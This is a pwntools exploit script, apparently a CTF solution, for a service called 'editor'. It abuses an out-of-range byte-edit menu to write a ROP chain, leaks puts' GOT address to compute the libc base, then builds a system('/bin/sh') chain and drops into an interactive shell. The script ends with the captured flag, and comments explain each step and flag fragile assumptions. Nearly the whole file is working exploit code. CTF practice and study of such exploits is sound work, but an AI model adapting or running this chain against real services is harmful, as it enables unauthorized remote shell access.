from pwn import *
import sys
# r = process('./editor')
# Exploit transcript (pwntools) for the "editor" CTF service: a two-stage
# ret2libc. Stage 1 writes a ROP chain that prints a GOT entry and returns to
# main; the printed bytes are interpreted as puts' libc address. Stage 2 uses
# that base to build a system("/bin/sh") chain and drops into interactive().
# Everything below is a fixed I/O sequence against the remote; the offsets,
# menu strings and 0x40xxxx addresses come from the challenge binary, which is
# not part of this file. From a defensive viewpoint the chain depends on the
# binary being loaded at a constant address (the hard-coded constants), on an
# unbounded line read (the "gets):" prompt suggests gets()), and on an
# index-based edit that accepts out-of-range indices — each of those is an
# assumption about the binary, TODO confirm against it.
r = remote('editor.litctf.live', 1337)
# Libc shipped with the challenge; used only to resolve symbol/string offsets.
libc = ELF('./libc-2.31.so')
puts = libc.sym['puts']
# gdb.attach(r, """
# b *0x40125E
# b *0x40133A
# b *0x4013AE
# """)
# 136-byte filler answered to the first prompt (the line ending in "gets):").
p = b'A' * 136
# Fixed addresses in the target binary. plt/got are presumably the puts PLT
# stub and GOT slot, since the value leaked by the stage-1 chain is later
# treated as puts' address — verify with the binary.
got = 0x403FC0
plt = 0x401040
main = 0x40125E
pop_rdi = 0x40140b #: pop rdi; ret;
r.recvuntil(b'gets):\n')
r.sendline(p)
# Menu option '1' behaves like "edit one byte": the service asks for an index
# (prompt ending "change!") and then a value (prompt ending "to!").
# NOTE(review): sendline() is passed str here and in several places below;
# recent pwntools versions warn about non-bytes arguments (b'1' is the
# unambiguous spelling). f'-32' is also an f-string with no placeholders.
r.recvuntil(b'do?\n')
r.sendline('1')
r.recvuntil(b'change!\n')
# Negative index: a NUL is written 32 positions before the start of whatever
# the index is applied to. Which variable this clobbers depends on the
# binary's stack layout, which is not visible here.
r.sendline(f'-32')
r.recvuntil(b'to!\n')
r.sendline(b'\x00')
# Stage-1 chain, one 8-byte slot per line:
#   0x43*8                  placeholder slot
#   pop_rdi ; got ; plt     plt(got) -> prints the GOT entry (the leak)
#   main                    return to main so stage 2 can run
# Each address is emitted as its 3 low bytes padded with 0x44 to 8 bytes; the
# 0x44 bytes are replaced by NUL in a second pass (see `ll` below).
p = (0x4343434343434343).to_bytes(8, byteorder='little')
p += (pop_rdi).to_bytes(3, byteorder='little').ljust(8, b'\x44')
p += (got).to_bytes(3, byteorder='little').ljust(8, b'\x44')
p += (plt).to_bytes(3, byteorder='little').ljust(8, b'\x44')
p += (main).to_bytes(3, byteorder='little').ljust(8, b'\x44')
# Write the chain one byte at a time through the edit menu, starting at index
# 144 (past the 136-byte filler). Which slot ends up as the saved return
# address depends on the frame layout — TODO confirm the offset.
l = 0
for i in range(144, 144 + len(p)):
    r.recvuntil(b'do?\n')
    r.sendline('1')
    r.recvuntil(b'change!\n')
    r.sendline(f'{i}')
    r.recvuntil(b'to!\n')
    r.sendline(p8(p[l]))
    l += 1
# Indices of the 0x44 padding bytes written above (the 5 high bytes of each
# 3-byte address: 155-159, 163-167, 171-175, 179-183). They are zeroed
# highest index first; the reason for the reverse order is not visible here
# (presumably the edit routine's handling of NUL-terminated data — verify).
ll = [155, 156, 157, 158, 159, 163, 164, 165, 166, 167, 171, 172, 173, 174, 175, 179, 180, 181, 182, 183][::-1]
for i in ll:
    r.recvuntil(b'do?\n')
    r.sendline('1')
    r.recvuntil(b'change!\n')
    r.sendline(f'{i}')
    r.recvuntil(b'to!\n')
    r.sendline(b'\x00')
# Put a NUL right after the 136-byte filler. No recvuntil precedes this '1':
# the pending "do?" prompt is left unread and is consumed by a later
# recvuntil(), which reads everything up to its delimiter.
r.sendline('1')
r.recvuntil(b'change!\n')
r.sendline('136')
r.recvuntil(b'to!\n')
r.sendline(b'\x00')
# Option '3' is expected to leave the vulnerable function and so run the
# chain (menu semantics inferred from the flow, not shown here).
r.sendline('3')
p = b'F' * (136)
# Leak parsing: all output up to the next "gets):" banner is split on
# whitespace and field 25 is read as a little-endian integer, from which the
# libc offset of puts is subtracted.
# NOTE(review): this is fragile — if the leaked bytes happen to contain a
# whitespace byte (0x09, 0x0a, 0x20, ...) the field count shifts and
# LIBC_BASE is wrong, with no check that the result looks like a libc base.
LIBC_BASE = int.from_bytes(r.recvuntil(b'gets):\n').split()[25], byteorder='little') - puts
# ADDR_BINSH = next(libc.search(b'/bin/sh')) + LIBC_BASE - 4 # local
ADDR_BINSH = next(libc.search(b'/bin/sh')) + LIBC_BASE
ADDR_SYSTEM = libc.symbols['system'] + LIBC_BASE
log.info(f'LIBC : {hex(LIBC_BASE)}')
log.info(f'BIN_SH : {hex(ADDR_BINSH)}')
log.info(f'SYSTEM : {hex(ADDR_SYSTEM)}')
# Second pass through main: same-size filler, then the stage-2 chain.
r.sendline(p)
# Stage-2 chain: placeholder ; ret ; pop rdi ; "/bin/sh" ; system.
# pop_rdi+1 is the lone `ret` of the gadget (per the comment on pop_rdi),
# presumably there to keep the stack 16-byte aligned at the system() call.
# Libc addresses are 6 bytes wide, so each gets only 2 padding bytes.
p = (0x4343434343434343).to_bytes(8, byteorder='little')
p += (pop_rdi+1).to_bytes(3, byteorder='little').ljust(8, b'\x44')
p += (pop_rdi).to_bytes(3, byteorder='little').ljust(8, b'\x44')
p += (ADDR_BINSH).to_bytes(6, byteorder='little').ljust(8, b'\x44')
p += (ADDR_SYSTEM).to_bytes(6, byteorder='little').ljust(8, b'\x44')
# Same byte-by-byte write loop as stage 1.
l = 0
for i in range(144, 144 + len(p)):
    r.recvuntil(b'do?\n')
    r.sendline('1')
    r.recvuntil(b'change!\n')
    r.sendline(f'{i}')
    r.recvuntil(b'to!\n')
    r.sendline(p8(p[l]))
    l += 1
# Index 136 is first set to a non-NUL byte (0x42), the padding bytes are
# zeroed, and then index 136 is restored to NUL. Why stage 2 needs the
# temporary non-NUL byte while stage 1 did not is not visible here — verify
# against the binary.
r.sendline('1')
r.recvuntil(b'change!\n')
r.sendline('136')
r.recvuntil(b'to!\n')
r.sendline(b'\x42')
# Padding positions for stage 2: 155-159, 163-167, 174-175, 182-183.
ll = [155, 156, 157, 158, 159, 163, 164, 165, 166, 167, 174, 175, 182, 183][::-1]
for i in ll:
    r.recvuntil(b'do?\n')
    r.sendline('1')
    r.recvuntil(b'change!\n')
    r.sendline(f'{i}')
    r.recvuntil(b'to!\n')
    r.sendline(b'\x00')
r.sendline('1')
r.recvuntil(b'change!\n')
r.sendline('136')
r.recvuntil(b'to!\n')
r.sendline(b'\x00')
# Trigger the stage-2 chain and hand the connection to the user.
r.sendline('3')
r.interactive()
# flag{y3t_4n0th3r_b0r1ng_r3t2l1bc}